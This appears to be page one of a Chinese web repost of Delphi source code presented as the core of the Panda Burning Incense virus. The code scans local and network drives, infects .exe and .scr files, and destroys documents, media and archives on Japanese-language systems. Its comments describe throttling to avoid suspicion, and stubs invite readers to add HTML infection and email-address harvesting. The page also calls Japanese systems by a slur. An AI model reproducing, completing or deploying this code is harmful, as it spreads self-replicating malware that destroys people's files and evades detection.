熊猫烧香核心代码

概要： filewrite(filehandle, catchword, len); inc(i); end;finally fileclose(filehandle); //关闭文件end;deletefile(pchar(filename)); //删除之exceptend;end;{ 获得可写的驱动器列表 }function getdrives: string;vardisktype: word;d: char;str: string;i: integer;beginfor i := 0 to 25 do //遍历26个字母begind := chr(i + 65);str := d + ':\';disktype := getdrivetype(pchar(str));//得到本地磁盘和网络盘if (disktype = drive_fixed) or (disktype = drive_remote) then result := result + d;end;end;{ 遍历

熊猫烧香核心代码,标签：电脑安全知识,个人电脑安全,http://www.laixuea.com
  filewrite(filehandle, catchword, len);
  inc(i);
  end;
finally
  fileclose(filehandle); //关闭文件
end;
deletefile(pchar(filename)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁盘和网络盘
if (disktype = drive_fixed) or (disktype = drive_remote) then
  result := result + d;
end;
end;
{ 遍历目录，感染和摧毁文件 }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
  (searchrec.name <> '..') then
  result := 0 //不是目录
else if (searchrec.attr = 16) and (searchrec.name <> '.') and
  (searchrec.name <> '..') then
  result := 1 //不是根目录
else result := 2; //是根目录
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
  peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列，避免引起怀疑
  if isvaliddir(searchrec) = 0 then
  begin
  fn := path + searchrec.name;
  ext := uppercase(extractfileext(fn));
  if (ext = '.exe') or (ext = '.scr') then
  begin
    infectonefile(fn); //感染可执行文件 
  end
  else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
  begin
    //感染html和asp文件，将base64编码后的病毒写入
    //感染浏览此网页的所有用户
    //哪位大兄弟愿意完成之？
  end
  else if ext = '.wab' then //outlook地址簿文件
  begin
    //获取outlook邮件地址
  end
  else if ext = '.adc' then //foxmail地址自动完成文件
  begin
    //获取foxmail邮件地址
  end
  else if ext = 'ind' then //foxmail地址簿文件
  begin
    //获取foxmail邮件地址
  end
  else
  begin
    if isjap then //是倭文操作系统
    begin
    if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
    (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
    (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
    (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
    (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
    (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
      smashfile(fn); //摧毁文件
    end;
  end;
  end;
  //感染或删除一个文件后睡眠200毫秒，避免cpu占用率过高引起怀疑
  sleep(200);

上一页  [1] [2] [3] [4]  下一页